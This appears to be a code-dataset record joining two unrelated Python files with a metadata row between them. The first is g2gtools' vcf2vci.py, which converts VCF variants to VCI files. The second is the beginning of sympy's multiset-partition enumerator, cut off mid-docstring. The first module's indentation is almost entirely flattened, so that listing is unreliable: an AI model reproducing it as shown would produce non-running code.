from collections import OrderedDict
from past.builtins import xrange
import multiprocessing
import os
import time
import pysam
from . import exceptions
from . import fasta
from . import g2g
from . import g2g_utils
from . import vcf
LOG = g2g.get_logger()
class VCFFileInformation:
def __init__(self, file_name=None, discard_file=None, sample_index=None):
self.file_name = file_name
self.discard_file = discard_file
self.sample_index = sample_index
self.lines = 0
def __str__(self):
return "{}, {}".format(self.file_name, self.sample_index)
class VCF2VCIInfo(object):
def __init__(self):
self.chromosome = None
# list of VCFFileInformation
self.vcf_files = []
self.fasta_file = None
# indel specific
self.prev_next_ref_pos_right = 1
self.prev_next_ref_pos_left = 1
self.diploid = False
self.passed = False
self.quality = False
self.vcf_keep = False
self.output_file_left = None
self.output_file_right = None
self.stats_left = {}
self.stats_right = {}
def walk_vcfs_together(readers, **kwargs):
if 'vcf_record_sort_key' in kwargs:
get_key = kwargs['vcf_record_sort_key']
else:
get_key = lambda r: (r.contig, r.pos)
nexts = []
for reader in readers:
try:
if reader:
nexts.append(reader.next())
else:
nexts.append(None)
except StopIteration:
nexts.append(None)
min_k = (None,)
while any([r is not None for r in nexts]):
next_idx_to_k = dict((i, get_key(r)) for i, r in enumerate(nexts) if r is not None)
keys_with_prev_contig = [k for k in next_idx_to_k.values() if k[0] == min_k[0]]
if any(keys_with_prev_contig):
min_k = min(keys_with_prev_contig)
else:
min_k = min(next_idx_to_k.values())
min_k_idxs = set([i for i, k in next_idx_to_k.items() if k == min_k])
yield [nexts[i] if i in min_k_idxs else None for i in range(len(nexts))]
for i in min_k_idxs:
try:
nexts[i] = readers[i].next()
except StopIteration:
nexts[i] = None
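# Illustrative sketch (added for clarity; not part of the original module):
# walking two toy "readers" together. Real callers pass pysam VCF iterators;
# the minimal interface faked here is .next() plus records with .contig/.pos.
# The helper name is hypothetical and the function is never called by the pipeline.
def _walk_vcfs_together_example():
    class _Rec(object):
        def __init__(self, contig, pos):
            self.contig, self.pos = contig, pos
    class _Reader(object):
        def __init__(self, recs):
            self._it = iter(recs)
        def next(self):
            return next(self._it)
    r1 = _Reader([_Rec('1', 10), _Rec('1', 30)])
    r2 = _Reader([_Rec('1', 10), _Rec('1', 20)])
    # yields [rec, rec] when both readers share a position, otherwise the
    # missing slot is None: (10, 10), (None, 20), (30, None)
    return [[None if r is None else (r.contig, r.pos) for r in pair]
            for pair in walk_vcfs_together([r1, r2])]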
#: TODO: utilize stats
def update_stats(stats, reason):
if not stats:
stats = {}
if reason in stats:
stats[reason] += 1
else:
stats[reason] = 1
return stats
def process_piece(merge_info):
stats = {}
try:
output_file_left = None
output_file_right = None
if merge_info.output_file_left:
output_file_left = open(merge_info.output_file_left, "w")
if merge_info.output_file_right:
output_file_right = open(merge_info.output_file_right, "w")
mi = ['L']
if merge_info.diploid:
mi = ['L', 'R']
LOG.info("Processing Chromosome {0}...".format(merge_info.chromosome))
iterators = []
discard_functions = []
for i, file_info in enumerate(merge_info.vcf_files):
vcf_tabix = pysam.TabixFile(file_info.file_name)
try:
vcf_iterator = vcf_tabix.fetch(merge_info.chromosome, parser=pysam.asVCF())
iterators.append(vcf_iterator)
except ValueError as ve:
iterators.append(None)
if file_info.discard_file:
vcf_discard = open(file_info.discard_file, "w")
                def discard_record(rec, _fp=vcf_discard):
                    # bind the file handle at definition time so each VCF file
                    # gets its own discard function (avoids closure late-binding
                    # over vcf_discard inside this loop)
                    _fp.write(str(rec))
                    _fp.write("\n")
discard_functions.append(discard_record)
else:
discard_functions.append(lambda rec: None)
n = 0
line_numbers = 0
for vcf_records in walk_vcfs_together(iterators):
for i, vcf_record in enumerate(vcf_records):
#LOG.debug(vcf_record)
if vcf_record is None:
continue
#LOG.debug(vcf_record.alt)
#LOG.debug(type(vcf_record.alt))
gt = vcf.parse_gt_tuple(vcf_record, merge_info.vcf_files[i].sample_index)
#LOG.debug(gt)
line_numbers = line_numbers + 1
if gt.is_snp:
# snp
if merge_info.passed and 'PASS' not in vcf_record.filter:
discard_functions[i](vcf_record)
#LOG.debug("Processing SNP {}".format(vcf_record))
n += 1
if merge_info.quality and gt.fi == '0':
discard_functions[i](vcf_record)
elif gt.left is None or gt.right is None:
discard_functions[i](vcf_record)
else:
if merge_info.diploid:
                            # 0 is the same as REF and does not need to be written
if gt.gt_left != 0:
output_file_left.write("{}_L\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, vcf_record.pos+1, '.', vcf_record.ref, gt.left, '.'))
if gt.gt_right != 0:
output_file_right.write("{}_R\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, vcf_record.pos+1, '.', vcf_record.ref, gt.right, '.'))
else:
if gt.gt_left == gt.gt_right and gt.gt_left != 0:
# ignore heterozygotes 0/1, 1/0, only process 0/0 and 1/1
#LOG.debug("ACCEPTED")
#LOG.debug('pos {} : ref {}, left {}, right {}'.format(vcf_snp.pos, vcf_snp.ref, gt.left, gt.right))
output_file_left.write("{}\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, vcf_record.pos+1, '.', vcf_record.ref, gt.left, '.'))
else:
# indel
LOG.debug("Processing INDEL {}".format(vcf_record))
if merge_info.passed and 'PASS' not in vcf_record.filter:
LOG.debug("TOSSED: FILTERED ON PASS")
LOG.debug(vcf_record)
stats = update_stats(stats, 'FILTERED ON PASS')
discard_functions[i](vcf_record)
continue
elif merge_info.quality and gt.fi == '0':
# FI : Whether a sample was a Pass(1) or fail (0) based on FILTER values
LOG.debug("TOSSED: FILTERED ON QUALITY")
LOG.debug(vcf_record)
stats = update_stats(stats, 'FILTERED ON QUALITY')
discard_functions[i](vcf_record)
continue
elif gt.left is None and gt.right is None:
LOG.debug("TOSSED: NO STRAIN DATA")
LOG.debug(vcf_record)
stats = update_stats(stats, 'NO STRAIN DATA')
LOG.debug(i)
LOG.debug(type(vcf_record))
discard_functions[i](vcf_record)
continue
elif not merge_info.diploid and gt.left != gt.right:
# haploid or hexaploid
# gt must be equal
LOG.debug("TOSSED: HETEROZYGOUS")
LOG.debug(vcf_record)
stats = update_stats(stats, 'HETEROZYGOUS')
discard_functions[i](vcf_record)
continue
# START L AND R, ONLY R IF DIPLOID
for l_or_r in mi:
#LOG.debug("******************")
#LOG.debug(l_or_r)
lr_out = ''
if l_or_r == 'L':
#LOG.debug("->LEFT")
lr_out = '_L' if merge_info.diploid else ''
alt_seq = str(gt.left)
stats = merge_info.stats_left
output_file = output_file_left
prev_next_ref_pos = merge_info.prev_next_ref_pos_left
else:
#LOG.debug("->RIGHT")
lr_out = '_R' if merge_info.diploid else ''
alt_seq = str(gt.right)
stats = merge_info.stats_right
output_file = output_file_right
prev_next_ref_pos = merge_info.prev_next_ref_pos_right
LOG.debug("prev_next_ref_pos={}".format(prev_next_ref_pos))
if gt.ref == alt_seq:
LOG.debug("TOSSED, REF AND ALT ARE EQUAL")
LOG.debug(vcf_record)
stats = update_stats(stats, 'REF AND ALT ARE EQUAL')
discard_functions[i](vcf_record)
continue
orig_alt_seq = alt_seq
LOG.debug("SAMPLE: {0}".format(vcf_record[merge_info.vcf_files[i].sample_index]))
LOG.debug("REF='{0}', ALT_L='{1}', ALT_R='{2}'. POS={3}".format(gt.ref, gt.left, gt.right, vcf_record.pos))
position = vcf_record.pos + 1
ref_seq = str(gt.ref)
len_ref = len(ref_seq)
len_alt = len(alt_seq)
base_changes = len_ref - len_alt
base_pos_diff = 0
if position < prev_next_ref_pos:
LOG.debug("TOSSED: VCF ROLLBACK: {0}".format(vcf_record))
LOG.debug(vcf_record)
stats = update_stats(stats, 'VCF ROLLBACK')
discard_functions[i](vcf_record)
continue
# find the position where the first base change is
for n in xrange(min(len_ref, len_alt)):
if ref_seq[n] != alt_seq[n]:
base_pos_diff = n
break
# if it is 0, take the minimum length
if base_pos_diff == 0:
base_pos_diff = min(len_ref, len_alt)
# add the base position difference
position += base_pos_diff
# recalculate the strings
shared_bases = ref_seq[:base_pos_diff]
ref_seq = ref_seq[base_pos_diff:]
alt_seq = alt_seq[base_pos_diff:]
dt = len(ref_seq)
dq = len(alt_seq)
next_ref_pos = position + len(ref_seq)
fragment_size = position - prev_next_ref_pos
'''
LOG.debug(' gt.ref: {0}'.format(gt.ref))
LOG.debug(' ref_seq: {0}'.format(ref_seq))
LOG.debug(' dt: {0}'.format(dt))
LOG.debug(' gt.alt: {0}'.format(orig_alt_seq))
LOG.debug(' alt_seq: {0}'.format(alt_seq))
LOG.debug(' dq: {0}'.format(dq))
LOG.debug(' position: {0}'.format(position))
LOG.debug('prev_next_ref_pos: {0}'.format(prev_next_ref_pos))
LOG.debug(' next_ref_pos: {0}'.format(next_ref_pos))
LOG.debug(' fragment_size: {0}'.format(fragment_size))
LOG.debug(' base_changes: {0}'.format(base_changes))
LOG.debug(' base_pos_diff: {0}'.format(base_pos_diff))
LOG.debug(' shared_bases: {0}'.format(shared_bases))
'''
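                        # Worked example (added for clarity, hypothetical numbers):
                        # REF='CATG', ALT='CA' (a 2-base deletion), vcf_record.pos=100,
                        # prev_next_ref_pos=95.  The shared prefix 'CA' gives
                        # base_pos_diff=2, so position becomes 101+2=103,
                        # shared_bases='CA', ref_seq='TG', alt_seq='',
                        # next_ref_pos=103+2=105 and fragment_size=103-95=8;
                        # the VCI line written below is "1\t101\tCA\tTG\t.\t8".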
# fix any 0 length
if fragment_size < 0:
#LOG.debug("TOSSED: FRAGMENT: {0}".format(vcf_record))
stats = update_stats(stats, 'FRAGMENT SIZE < 0')
discard_functions[i](vcf_record)
continue
if fragment_size != 0:
ref_str = ref_seq if ref_seq else '.'
alt_str = alt_seq if alt_seq else '.'
out = "{}{}\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, lr_out, vcf_record.pos+1, shared_bases, ref_str, alt_str, fragment_size)
LOG.debug(out)
output_file.write(out)
else:
#
# THIS SHOULD NOT HAPPEN
#
raise exceptions.G2GVCFError('Conflicting VCF entries')
stats = update_stats(stats, 'ACCEPTED')
if l_or_r == 'L':
merge_info.stats_left = stats
merge_info.prev_next_ref_pos_left = next_ref_pos
LOG.debug('setting merge_info.prev_next_ref_pos_left={}'.format(merge_info.prev_next_ref_pos_left))
else:
merge_info.stats_right = stats
merge_info.prev_next_ref_pos_right = next_ref_pos
LOG.debug('setting merge_info.prev_next_ref_pos_right={}'.format(merge_info.prev_next_ref_pos_right))
if merge_info.output_file_left:
output_file_left.close()
if merge_info.output_file_right:
output_file_right.close()
except KeyboardInterrupt:
raise exceptions.KeyboardInterruptError()
except Exception as e:
g2g_utils._show_error()
raise Exception("Unknown exception")
ret = {}
ret['chrom'] = merge_info.chromosome
ret['stats'] = stats
ret['merge_info'] = merge_info
ret['line_numbers'] = line_numbers
return ret
def wrapper(args):
"""
Simple wrapper, useful for debugging.
:param args: the arguments to process_piece
:return: the same as process_piece
"""
LOG.debug(args)
return process_piece(*args)
def log_stats(stats):
LOG.info("STATISTICS")
for s, stat in stats.items():
LOG.info("{0:,}\t\t{1}".format(stat, s))
def create_vci_header(temp_directory, fasta_file, vcf_input_files, output_file, strain, vcf_keep, passed, quality, diploid, num_processes, bgzip):
file = g2g_utils.gen_file_name("header", output_dir=temp_directory, extension='', append_time=False)
with open(file, "w") as fd:
fd.write("##CREATION_TIME={}\n".format(time.strftime("%m/%d/%Y %H:%M:%S")))
for vcf_file in vcf_input_files:
fd.write("##INPUT_VCF={}\n".format(vcf_file.file_name))
fd.write("##FASTA_FILE={}\n".format(fasta_file))
fd.write("##STRAIN={}\n".format(strain))
fd.write("##VCF_KEEP={}\n".format(vcf_keep))
fd.write("##FILTER_PASSED={}\n".format(passed))
fd.write("##FILTER_QUALITY={}\n".format(quality))
fd.write("##DIPLOID={}\n".format(diploid))
fd.write("##PROCESSES={}\n".format(num_processes))
fasta_file = fasta.FastaFile(fasta_file)
for c in fasta_file.references:
fd.write("##CONTIG={}:{}\n".format(c, fasta_file.get_reference_length(c)))
fd.write("#CHROM\tPOS\tANCHOR\tINS\tDEL\tFRAG\n")
return file
def process(vcf_files, fasta_file, output_file, strain, vcf_keep=False, passed=False, quality=False, diploid=False, num_processes=None, bgzip=False):
start = time.time()
output_file = g2g_utils.check_file(output_file, 'w')
output_file_dir = os.path.dirname(output_file)
vcf_file_inputs = []
if vcf_files:
for file_name in vcf_files:
vcf_file = g2g_utils.check_file(file_name)
LOG.info("VCF file: {0}".format(vcf_file))
LOG.info("Checking for index file, creating if needed...")
g2g_utils.index_file(original_file=vcf_file, file_format="vcf", overwrite=False)
vcf_discard_file = None
if vcf_keep:
vcf_discard_file = "{0}.errors.vcf".format(os.path.basename(output_file))
vcf_discard_file = os.path.join(output_file_dir, vcf_discard_file)
LOG.info("VCF indel discard file: {0}".format(vcf_discard_file))
vcf_file_inputs.append(VCFFileInformation(vcf_file, vcf_discard_file))
if len(vcf_file_inputs) == 0:
raise exceptions.G2GValueError("No VCF files.")
if not fasta_file:
raise exceptions.G2GValueError("No fasta file was specified.")
if not strain:
raise exceptions.G2GValueError("No strain was specified.")
if not num_processes:
num_processes = multiprocessing.cpu_count()
else:
if num_processes <= 0:
num_processes = 1
LOG.info("Fasta File: {0}".format(output_file))
LOG.info("Strain: {0}".format(strain))
LOG.info("Pass filter on: {0}".format(str(passed)))
LOG.info("Quality filter on: {0}".format(str(quality)))
LOG.info("Diploid: {0}".format(str(diploid)))
LOG.info("Number of processes: {0}".format(num_processes))
LOG.info("Output VCI File: {0}".format(output_file))
# not all chromosomes/seqid will be processed if not in vcf file
processed_seq_ids = {}
temp_directory = g2g_utils.create_temp_dir('vcf2vci', dir='.')
LOG.debug("Temp directory: {}".format(temp_directory))
header_file = create_vci_header(temp_directory, fasta_file, vcf_file_inputs, output_file, strain, vcf_keep, passed, quality, diploid, num_processes, bgzip)
for i, vcf_file in enumerate(vcf_file_inputs):
tb_file = pysam.TabixFile(vcf_file.file_name)
for h in tb_file.header:
h = g2g_utils.s(h)
if h[:6] == '#CHROM':
try:
elems = h.split('\t')
samples = elems[9:]
samples = dict(zip(samples, (x for x in xrange(len(samples)))))
vcf_file_inputs[i].sample_index = samples[strain]
except KeyError as ke:
raise exceptions.G2GVCFError("Unknown strain '{0}', valid strains are: {1}".format(strain, ", ".join(samples)))
for seq_id in tb_file.contigs:
processed_seq_ids[seq_id] = False
tmp_processed_seq_ids = OrderedDict()
for k in g2g_utils.natsorted(processed_seq_ids.keys()):
tmp_processed_seq_ids[k] = False
processed_seq_ids = tmp_processed_seq_ids
all_merge_info = []
try:
for c in processed_seq_ids:
merge_info = VCF2VCIInfo()
merge_info.chromosome = c
merge_info.vcf_files = vcf_file_inputs
merge_info.fasta_file = fasta_file
merge_info.diploid = diploid
merge_info.passed = passed
merge_info.quality = quality
merge_info.vcf_keep = vcf_keep
if diploid:
merge_info.output_file_left = g2g_utils.gen_file_name("chr{}.left".format(c), output_dir=temp_directory, extension='vci', append_time=False)
merge_info.output_file_right = g2g_utils.gen_file_name("chr{}.right".format(c), output_dir=temp_directory, extension='vci', append_time=False)
g2g_utils.delete_file(merge_info.output_file_left)
g2g_utils.delete_file(merge_info.output_file_right)
else:
merge_info.output_file_left = g2g_utils.gen_file_name("chr{}.right".format(c), output_dir=temp_directory, extension='vci', append_time=False)
g2g_utils.delete_file(merge_info.output_file_left)
all_merge_info.append(merge_info)
LOG.info("Parsing VCF files...")
args = zip(all_merge_info)
pool = multiprocessing.Pool(num_processes)
results = pool.map(wrapper, args)
# parse results
total = 0
for r in results:
total += r['line_numbers']
# show stats
#TODO: make sure stats are good and show statistics
LOG.debug("Combining temp files...")
LOG.info("Finalizing VCI file...")
files = [header_file]
if diploid:
for mi in all_merge_info:
files.append(mi.output_file_left)
files.append(mi.output_file_right)
g2g_utils.concatenate_files(files, output_file, True)
if bgzip:
g2g_utils.bgzip_and_index_file(output_file, output_file + ".gz", delete_original=True, file_format="vcf")
else:
for mi in all_merge_info:
files.append(mi.output_file_left)
g2g_utils.concatenate_files(files, output_file, True)
if bgzip:
g2g_utils.bgzip_and_index_file(output_file, output_file + ".gz", delete_original=True, file_format="vcf")
# if vcf_keep:
# vcf_discard_file.close()
# TODO: make sure stats are good and show statistics
LOG.info("Parsed {0:,} total lines".format(total))
except exceptions.KeyboardInterruptError:
pool.terminate()
raise exceptions.G2GError("Keyboard quit consumed")
except KeyboardInterrupt:
pool.terminate()
raise exceptions.G2GError("Execution halted")
except Exception as e:
g2g_utils._show_error()
raise exceptions.G2GError("Execution halted unknown error")
finally:
g2g_utils.delete_dir(temp_directory)
LOG.info("VCI creation complete: {0}".format(g2g_utils.format_time(start, time.time())))
|
churchill-lab/g2gtools
|
g2gtools/vcf2vci.py
|
Python
|
mit
| 22,155
|
[
"pysam"
] |
510349f8b539c3fd853bae634c1c4aaf9b5369e93f836ee03312c8fea95de3e1
|
from __future__ import print_function, division
from sympy.core.compatibility import range
"""
Algorithms and classes to support enumerative combinatorics.
Currently just multiset partitions, but more could be added.
Terminology (following Knuth, algorithm 7.1.2.5M TAOCP)
*multiset* aaabbcccc has a *partition* aaabc | bccc
The submultisets, aaabc and bccc of the partition are called
*parts*, or sometimes *vectors*. (Knuth notes that multiset
partitions can be thought of as partitions of vectors of integers,
where the ith element of the vector gives the multiplicity of
element i.)
The values a, b and c are *components* of the multiset. These
correspond to elements of a set, but in a multiset can be present
with a multiplicity greater than 1.
The algorithm deserves some explanation.
Think of the part aaabc from the multiset above. If we impose an
ordering on the components of the multiset, we can represent a part
with a vector, in which the value of the first element of the vector
corresponds to the multiplicity of the first component in that
part. Thus, aaabc can be represented by the vector [3, 1, 1]. We
can also define an ordering on parts, based on the lexicographic
ordering of the vector (leftmost vector element, i.e., the element
with the smallest component number, is the most significant), so
that [3, 1, 1] > [3, 1, 0] and [3, 1, 1] > [2, 1, 4]. The ordering
on parts can be extended to an ordering on partitions: First, sort
the parts in each partition, left-to-right in decreasing order. Then
partition A is greater than partition B if A's leftmost/greatest
part is greater than B's leftmost part. If the leftmost parts are
equal, compare the second parts, and so on.
In this ordering, the greatest partition of a given multiset has only
one part. The least partition is the one in which the components
are spread out, one per part.
The enumeration algorithms in this file yield the partitions of the
argument multiset in decreasing order. The main data structure is a
stack of parts, corresponding to the current partition. An
important invariant is that the parts on the stack are themselves in
decreasing order. This data structure is decremented to find the
next smaller partition. Most often, decrementing the partition will
only involve adjustments to the smallest parts at the top of the
stack, much as adjacent integers *usually* differ only in their last
few digits.
Knuth's algorithm uses two main operations on parts:
Decrement - change the part so that it is smaller in the
(vector) lexicographic order, but reduced by the smallest amount possible.
For example, if the multiset has vector [5,
3, 1], and the bottom/greatest part is [4, 2, 1], this part would
decrement to [4, 2, 0], while [4, 0, 0] would decrement to [3, 3,
1]. A singleton part is never decremented -- [1, 0, 0] is not
decremented to [0, 3, 1]. Instead, the decrement operator needs
to fail for this case. In Knuth's pseudocode, the decrement
operator is step m5.
Spread unallocated multiplicity - Once a part has been decremented,
it cannot be the rightmost part in the partition. There is some
multiplicity that has not been allocated, and new parts must be
created above it in the stack to use up this multiplicity. To
maintain the invariant that the parts on the stack are in
decreasing order, these new parts must be less than or equal to
the decremented part.
For example, if the multiset is [5, 3, 1], and its most
significant part has just been decremented to [5, 3, 0], the
spread operation will add a new part so that the stack becomes
[[5, 3, 0], [0, 0, 1]]. If the most significant part (for the
same multiset) has been decremented to [2, 0, 0] the stack becomes
[[2, 0, 0], [2, 0, 0], [1, 3, 1]]. In the pseudocode, the spread
operation for one part is step m2. The complete spread operation
is a loop of steps m2 and m3.
In order to facilitate the spread operation, Knuth stores, for each
component of each part, not just the multiplicity of that component
in the part, but also the total multiplicity available for this
component in this part or any lesser part above it on the stack.
One added twist is that Knuth does not represent the part vectors as
arrays. Instead, he uses a sparse representation, in which a
component of a part is represented as a component number (c), plus
the multiplicity of the component in that part (v) as well as the
total multiplicity available for that component (u). This saves
time that would be spent skipping over zeros.
"""
class PartComponent(object):
"""Internal class used in support of the multiset partitions
enumerators and the associated visitor functions.
Represents one component of one part of the current partition.
A stack of these, plus an auxiliary frame array, f, represents a
partition of the multiset.
Knuth's pseudocode makes c, u, and v separate arrays.
"""
__slots__ = ('c', 'u', 'v')
def __init__(self):
self.c = 0 # Component number
self.u = 0 # The as yet unpartitioned amount in component c
# *before* it is allocated by this triple
self.v = 0 # Amount of c component in the current part
# (v<=u). An invariant of the representation is
# that the next higher triple for this component
# (if there is one) will have a value of u-v in
# its u attribute.
def __repr__(self):
"for debug/algorithm animation purposes"
return 'c:%d u:%d v:%d' % (self.c, self.u, self.v)
def __eq__(self, other):
"""Define value oriented equality, which is useful for testers"""
return (isinstance(other, self.__class__) and
self.c == other.c and
self.u == other.u and
self.v == other.v)
def __ne__(self, other):
"""Defined for consistency with __eq__"""
return not self == other
# This function tries to be a faithful implementation of algorithm
# 7.1.2.5M in Volume 4A, Combinatoral Algorithms, Part 1, of The Art
# of Computer Programming, by Donald Knuth. This includes using
# (mostly) the same variable names, etc. This makes for rather
# low-level Python.
# Changes from Knuth's pseudocode include
# - use PartComponent struct/object instead of 3 arrays
# - make the function a generator
# - map (with some difficulty) the GOTOs to Python control structures.
# - Knuth uses 1-based numbering for components, this code is 0-based
# - renamed variable l to lpart.
# - flag variable x takes on values True/False instead of 1/0
#
def multiset_partitions_taocp(multiplicities):
"""Enumerates partitions of a multiset.
Parameters
==========
multiplicities
list of integer multiplicities of the components of the multiset.
Yields
======
state
Internal data structure which encodes a particular partition.
    This output is then usually processed by a visitor function
which combines the information from this data structure with
the components themselves to produce an actual partition.
Unless they wish to create their own visitor function, users will
have little need to look inside this data structure. But, for
reference, it is a 3-element list with components:
f
is a frame array, which is used to divide pstack into parts.
lpart
points to the base of the topmost part.
pstack
is an array of PartComponent objects.
The ``state`` output offers a peek into the internal data
structures of the enumeration function. The client should
treat this as read-only; any modification of the data
structure will cause unpredictable (and almost certainly
incorrect) results. Also, the components of ``state`` are
modified in place at each iteration. Hence, the visitor must
be called at each loop iteration. Accumulating the ``state``
instances and processing them later will not work.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import multiset_partitions_taocp
>>> # variables components and multiplicities represent the multiset 'abb'
>>> components = 'ab'
>>> multiplicities = [1, 2]
>>> states = multiset_partitions_taocp(multiplicities)
>>> list(list_visitor(state, components) for state in states)
[[['a', 'b', 'b']],
[['a', 'b'], ['b']],
[['a'], ['b', 'b']],
[['a'], ['b'], ['b']]]
See Also
========
sympy.utilities.iterables.multiset_partitions: Takes a multiset
as input and directly yields multiset partitions. It
dispatches to a number of functions, including this one, for
implementation. Most users will find it more convenient to
use than multiset_partitions_taocp.
"""
# Important variables.
# m is the number of components, i.e., number of distinct elements
m = len(multiplicities)
# n is the cardinality, total number of elements whether or not distinct
n = sum(multiplicities)
# The main data structure, f segments pstack into parts. See
# list_visitor() for example code indicating how this internal
# state corresponds to a partition.
# Note: allocation of space for stack is conservative. Knuth's
# exercise 7.2.1.5.68 gives some indication of how to tighten this
# bound, but this is not implemented.
pstack = [PartComponent() for i in range(n * m + 1)]
f = [0] * (n + 1)
# Step M1 in Knuth (Initialize)
# Initial state - entire multiset in one part.
for j in range(m):
ps = pstack[j]
ps.c = j
ps.u = multiplicities[j]
ps.v = multiplicities[j]
# Other variables
f[0] = 0
a = 0
lpart = 0
f[1] = m
b = m # in general, current stack frame is from a to b - 1
while True:
while True:
# Step M2 (Subtract v from u)
j = a
k = b
x = False
while j < b:
pstack[k].u = pstack[j].u - pstack[j].v
if pstack[k].u == 0:
x = True
elif not x:
pstack[k].c = pstack[j].c
pstack[k].v = min(pstack[j].v, pstack[k].u)
x = pstack[k].u < pstack[j].v
k = k + 1
else: # x is True
pstack[k].c = pstack[j].c
pstack[k].v = pstack[k].u
k = k + 1
j = j + 1
# Note: x is True iff v has changed
# Step M3 (Push if nonzero.)
if k > b:
a = b
b = k
lpart = lpart + 1
f[lpart + 1] = b
# Return to M2
else:
break # Continue to M4
# M4 Visit a partition
state = [f, lpart, pstack]
yield state
# M5 (Decrease v)
while True:
j = b-1
while (pstack[j].v == 0):
j = j - 1
if j == a and pstack[j].v == 1:
# M6 (Backtrack)
if lpart == 0:
return
lpart = lpart - 1
b = a
a = f[lpart]
# Return to M5
else:
pstack[j].v = pstack[j].v - 1
for k in range(j + 1, b):
pstack[k].v = pstack[k].u
break # GOTO M2
# --------------- Visitor functions for multiset partitions ---------------
# A visitor takes the partition state generated by
# multiset_partitions_taocp or other enumerator, and produces useful
# output (such as the actual partition).
def factoring_visitor(state, primes):
"""Use with multiset_partitions_taocp to enumerate the ways a
number can be expressed as a product of factors. For this usage,
the exponents of the prime factors of a number are arguments to
the partition enumerator, while the corresponding prime factors
are input here.
Examples
========
To enumerate the factorings of a number we can think of the elements of the
partition as being the prime factors and the multiplicities as being their
exponents.
>>> from sympy.utilities.enumerative import factoring_visitor
>>> from sympy.utilities.enumerative import multiset_partitions_taocp
>>> from sympy import factorint
>>> primes, multiplicities = zip(*factorint(24).items())
>>> primes
(2, 3)
>>> multiplicities
(3, 1)
>>> states = multiset_partitions_taocp(multiplicities)
>>> list(factoring_visitor(state, primes) for state in states)
[[24], [8, 3], [12, 2], [4, 6], [4, 2, 3], [6, 2, 2], [2, 2, 2, 3]]
"""
f, lpart, pstack = state
factoring = []
for i in range(lpart + 1):
factor = 1
for ps in pstack[f[i]: f[i + 1]]:
if ps.v > 0:
factor *= primes[ps.c] ** ps.v
factoring.append(factor)
return factoring
def list_visitor(state, components):
"""Return a list of lists to represent the partition.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import multiset_partitions_taocp
>>> states = multiset_partitions_taocp([1, 2, 1])
>>> s = next(states)
>>> list_visitor(s, 'abc') # for multiset 'a b b c'
[['a', 'b', 'b', 'c']]
>>> s = next(states)
    >>> list_visitor(s, [1, 2, 3])  # for multiset '1 2 2 3'
[[1, 2, 2], [3]]
"""
f, lpart, pstack = state
partition = []
for i in range(lpart+1):
part = []
for ps in pstack[f[i]:f[i+1]]:
if ps.v > 0:
part.extend([components[ps.c]] * ps.v)
partition.append(part)
return partition
class MultisetPartitionTraverser():
"""
Has methods to ``enumerate`` and ``count`` the partitions of a multiset.
This implements a refactored and extended version of Knuth's algorithm
    7.1.2.5M [AOCP]_.
The enumeration methods of this class are generators and return
data structures which can be interpreted by the same visitor
functions used for the output of ``multiset_partitions_taocp``.
See Also
========
multiset_partitions_taocp
    sympy.utilities.iterables.multiset_partitions
Examples
========
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> m.count_partitions([4,4,4,2])
127750
>>> m.count_partitions([3,3,3])
686
References
==========
.. [AOCP] Algorithm 7.1.2.5M in Volume 4A, Combinatoral Algorithms,
Part 1, of The Art of Computer Programming, by Donald Knuth.
.. [Factorisatio] On a Problem of Oppenheim concerning
"Factorisatio Numerorum" E. R. Canfield, Paul Erdos, Carl
Pomerance, JOURNAL OF NUMBER THEORY, Vol. 17, No. 1. August
1983. See section 7 for a description of an algorithm
similar to Knuth's.
.. [Yorgey] Generating Multiset Partitions, Brent Yorgey, The
Monad.Reader, Issue 8, September 2007.
"""
def __init__(self):
self.debug = False
# TRACING variables. These are useful for gathering
# statistics on the algorithm itself, but have no particular
# benefit to a user of the code.
self.k1 = 0
self.k2 = 0
self.p1 = 0
def db_trace(self, msg):
"""Useful for usderstanding/debugging the algorithms. Not
generally activated in end-user code."""
if self.debug:
letters = 'abcdefghijklmnopqrstuvwxyz'
state = [self.f, self.lpart, self.pstack]
print("DBG:", msg,
["".join(part) for part in list_visitor(state, letters)],
animation_visitor(state))
#
# Helper methods for enumeration
#
def _initialize_enumeration(self, multiplicities):
"""Allocates and initializes the partition stack.
This is called from the enumeration/counting routines, so
there is no need to call it separately."""
num_components = len(multiplicities)
# cardinality is the total number of elements, whether or not distinct
cardinality = sum(multiplicities)
# pstack is the partition stack, which is segmented by
# f into parts.
self.pstack = [PartComponent() for i in
range(num_components * cardinality + 1)]
self.f = [0] * (cardinality + 1)
# Initial state - entire multiset in one part.
for j in range(num_components):
ps = self.pstack[j]
ps.c = j
ps.u = multiplicities[j]
ps.v = multiplicities[j]
self.f[0] = 0
self.f[1] = num_components
self.lpart = 0
# The decrement_part() method corresponds to step M5 in Knuth's
# algorithm. This is the base version for enum_all(). Modified
# versions of this method are needed if we want to restrict
# sizes of the partitions produced.
def decrement_part(self, part):
"""Decrements part (a subrange of pstack), if possible, returning
True iff the part was successfully decremented.
If you think of the v values in the part as a multi-digit
integer (least significant digit on the right) this is
basically decrementing that integer, but with the extra
constraint that the leftmost digit cannot be decremented to 0.
Parameters
==========
part
The part, represented as a list of PartComponent objects,
which is to be decremented.
"""
plen = len(part)
for j in range(plen - 1, -1, -1):
if (j == 0 and part[j].v > 1) or (j > 0 and part[j].v > 0):
# found val to decrement
part[j].v -= 1
# Reset trailing parts back to maximum
for k in range(j + 1, plen):
part[k].v = part[k].u
return True
return False
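    # Illustrative example (added for clarity, hypothetical values): with
    # available multiplicities u = [3, 2], a part with v = [2, 0] decrements
    # to v = [1, 2] (the trailing component springs back to its maximum u),
    # while a part with v = [1, 0] cannot be decremented, because the
    # leading value may never drop to 0.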
# Version to allow number of parts to be bounded from above.
# Corresponds to (a modified) step M5.
def decrement_part_small(self, part, ub):
"""Decrements part (a subrange of pstack), if possible, returning
True iff the part was successfully decremented.
Parameters
==========
part
part to be decremented (topmost part on the stack)
ub
the maximum number of parts allowed in a partition
returned by the calling traversal.
Notes
=====
The goal of this modification of the ordinary decrement method
is to fail (meaning that the subtree rooted at this part is to
be skipped) when it can be proved that this part can only have
child partitions which are larger than allowed by ``ub``. If a
decision is made to fail, it must be accurate, otherwise the
enumeration will miss some partitions. But, it is OK not to
capture all the possible failures -- if a part is passed that
